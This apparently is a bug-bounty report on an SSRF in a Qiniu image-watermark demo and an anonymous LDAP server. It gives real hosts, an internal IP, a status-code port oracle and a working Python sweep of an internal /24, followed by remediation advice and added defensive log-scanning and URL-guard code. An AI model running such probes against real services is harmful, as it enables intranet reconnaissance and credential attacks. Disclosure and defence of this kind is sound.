
SSRF on a Qiniu site allows probing the intranet

16-07-07

SSRF on a Qiniu site allows probing the intranet + LDAP anonymous access

I. SSRF vulnerability

The vulnerable host appears to be a demo/test site.

http://demos.qiniu.com/demo/qimage/index.html

The endpoint with the SSRF flaw first fetches a remote image, then composites it as a watermark over the current image. Using the Baidu logo as the demonstration, the result looks like this:

http://rwxf.qiniudn.com/1234.jpg?watermark/1/image/aHR0cHM6Ly93d3cuYmFpZHUuY29tL2ltZy9iZF9sb2dvMS5wbmc=/dissolve/100/gravity/SouthEast

[screenshot: 2.png]

The base64 string after image/ is the IP and port you want to probe. How do you learn an internal IP in the first place? Here, one of Qiniu's IPs was found to expose an Elasticsearch instance without authentication.

[screenshot: 1.PNG]

From this we know the intranet contains at least the following segment:

172.30.251.168:9200

Base64-encode http://172.30.251.168:9200 and place it after image/:

http://rwxf.qiniudn.com/1234.jpg?watermark/1/image/aHR0cDovLzE3Mi4zMC4yNTEuMTY4OjkyMDA=/dissolve/100/gravity/SouthEast

If the IP is alive and the port is open, a 501 error is returned. For example, probing http://172.30.251.168:9200

[screenshot: 6.png]

If the IP is down or the port is closed, a 502 error is returned. For example, probing http://172.30.251.168:1356

[screenshot: 4.png]

Testing produced the following pattern:

Returns 403: IP alive and port open, but access to that path is forbidden

Returns 404: IP alive and port open, but the requested image does not exist

Returns 501: IP alive and port open

Returns 502: IP down or port closed

To make testing easier, I wrote a script that probes whether port 80 is open on every address in the 172.30.251.0/24 range; any host that returns the 501 error is alive with the port open. Going one step further, the application running on a target could be identified by fetching its default logo or favicon.ico.

#coding=utf-8
'''
poc: qiniu_ssrf
url: http://demos.qiniu.com/demo/qimage/index.html
'''
import base64
import ipaddress  # stdlib replacement for the original `from IPy import IP`

import requests

# Every address in the /24, network and broadcast included, as IPy iterated it.
mask = ipaddress.ip_network('172.30.251.0/24')

for ip in mask:
    print(ip)
    # The image parameter is base64; b64encode needs bytes under Python 3.
    b64Domain = base64.b64encode(('http://' + str(ip)).encode()).decode()
    req = requests.get(
        "http://rwxf.qiniudn.com/1234.jpg?watermark/1/image/%s/dissolve/100/gravity/SouthEast" % b64Domain,
        timeout=10)  # do not hang on hosts that never answer
    print(req.text + "\n")
    # Append each address and the raw JSON error it produced to the log file.
    with open('/tmp/qnscan.txt', 'a') as qnfile:
        qnfile.write(str(ip) + '\n' + req.text + '\n\n')

The results returned were:


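From the defender's side, every probe in the scan above leaves a watermark/1/image/<base64> request in the edge access log, so the targets can be decoded and flagged after the fact. The following is an added example, not code from the report: it decodes that segment from constructed log lines (the four-field line format is an assumption) and flags any fetch aimed at a non-public address.

```python
import base64
import binascii
import ipaddress
import re
from urllib.parse import urlsplit

# The image/<base64> segment of a Qiniu-style watermark query. Qiniu uses
# URL-safe base64, so the value ends at the next '/'.
IMAGE_SEG = re.compile(r"watermark/1/image/([^/?&\s]+)")


def decode_image_target(query):
    """Return the decoded fetch URL from the image/ segment, or None."""
    m = IMAGE_SEG.search(query)
    if not m:
        return None
    raw = m.group(1)
    raw += "=" * (-len(raw) % 4)  # restore any stripped '=' padding
    try:
        # urlsafe_b64decode also accepts the standard '+' and '/' alphabet.
        return base64.urlsafe_b64decode(raw).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def is_internal_host(host):
    """True when host is an IP literal outside public address space.

    Hostnames are not resolved here: a log-side check cannot know what a
    name resolved to at fetch time, so names need the server-side guard.
    """
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False
    return not ip.is_global


def scan_log(lines):
    """Return (client, target_url, status) for every request whose
    watermark image URL points at an internal address."""
    findings = []
    for line in lines:
        parts = line.split()
        if len(parts) != 4:  # constructed format: client method path status
            continue
        client, _method, path, status = parts
        target = decode_image_target(path)
        if target is None:
            continue
        if is_internal_host(urlsplit(target).hostname or ""):
            findings.append((client, target, status))
    return findings


def make_line(client, target, status):
    """Build one constructed log line in the format scan_log expects."""
    b64 = base64.urlsafe_b64encode(target.encode()).decode()
    return (f"{client} GET /1234.jpg?watermark/1/image/{b64}"
            f"/dissolve/100/gravity/SouthEast {status}")


# Constructed sample: one legitimate fetch, two probes, one unrelated request.
SAMPLE_LOG = [
    make_line("198.51.100.7", "https://www.baidu.com/img/bd_logo1.png", "200"),
    make_line("198.51.100.7", "http://172.30.251.168:9200", "400"),
    make_line("198.51.100.7", "http://127.0.0.1:8080", "400"),
    "203.0.113.9 GET /1234.jpg 200",
]

if __name__ == "__main__":
    for client, target, status in scan_log(SAMPLE_LOG):
        print(f"{client} probed {target} (edge status {status})")
```

Note that the "501" the report reads as a status code is the source line in ImageMagick's error/constitute.c/ReadImage/501 message: the fetch itself succeeded and the body simply was not decodable as an image, which is why it still marks an open port.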
II. LDAP anonymous access

IP: 115.231.182.75

Port: 389

All of the company's personnel information can be retrieved; this information could be used to brute-force mailboxes or applications that authenticate against LDAP.

[screenshot: 5.png]

During testing, an Onion application you had deployed (115.231.182.75:8090) was vulnerable and I accidentally knocked it over; my apologies.

See the detailed description above.

Remediation:

1. SSRF: return one uniform error message so users cannot infer the remote server's port state from it, and restrict the URLs the server will fetch so they cannot point at internal IPs.

2. LDAP: disable anonymous access on the LDAP server.
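The first remediation item, as an added example that is not Qiniu's code: a guard the watermark endpoint would run before fetching, which refuses any URL whose host resolves to a non-public address and returns one fixed error body whatever the reason. The resolver is injected, and the DNS table, names and addresses below are constructed so the example runs offline.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# One fixed body for every failure: the client learns nothing about why.
UNIFORM_ERROR = {"error": "fetch image url failed"}


class FetchRejected(Exception):
    """Raised before any outbound connection; the detail is for server logs."""


def resolve_all(host):
    """Default resolver: every A/AAAA record for host (real DNS lookup)."""
    return sorted({ai[4][0] for ai in socket.getaddrinfo(host, None)})


def validate_fetch_url(url, resolver=resolve_all):
    """Return (host, addrs) if url may be fetched, else raise FetchRejected."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        raise FetchRejected("scheme not allowed: %r" % parts.scheme)
    host = parts.hostname
    if not host or parts.username or parts.password:
        raise FetchRejected("malformed or credentialed authority")
    try:
        addrs = resolver(host)
    except OSError as exc:  # socket.gaierror is an OSError
        raise FetchRejected("resolution failed for %s: %s" % (host, exc))
    if not addrs:
        raise FetchRejected("no addresses for %s" % host)
    # Every record must be globally routable, so a name that mixes a public
    # and a private record is rejected as a whole.
    for addr in addrs:
        if not ipaddress.ip_address(addr).is_global:
            raise FetchRejected("non-public address %s for %s" % (addr, host))
    return host, addrs


def watermark_fetch_decision(url, resolver=resolve_all):
    """What the endpoint does with a client-supplied image URL."""
    try:
        host, addrs = validate_fetch_url(url, resolver)
    except FetchRejected as exc:
        # The client sees UNIFORM_ERROR whether the target was a closed port,
        # a forbidden path or an internal address; the detail goes to the log.
        return {"allowed": False, "response": UNIFORM_ERROR, "log": str(exc)}
    # Connect to a validated address rather than re-resolving the name, and
    # re-run this check on every redirect hop; otherwise a rebinding name or
    # a 302 to an internal address walks straight past the allow-list.
    return {"allowed": True, "host": host, "pin_to": addrs[0]}


# Constructed DNS table so the example runs offline (assumed names/addresses).
FAKE_DNS = {
    "cdn.example.com": ["8.8.8.8"],
    "rebind.example.com": ["8.8.4.4", "172.30.251.168"],  # mixed records
    "localhost": ["127.0.0.1"],
}


def fake_resolver(host):
    """Stand-in for resolve_all; unknown names fail the way DNS does."""
    try:
        ipaddress.ip_address(host)
        return [host]  # IP literal: nothing to resolve
    except ValueError:
        pass
    if host not in FAKE_DNS:
        raise socket.gaierror("constructed NXDOMAIN for %s" % host)
    return FAKE_DNS[host]
```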
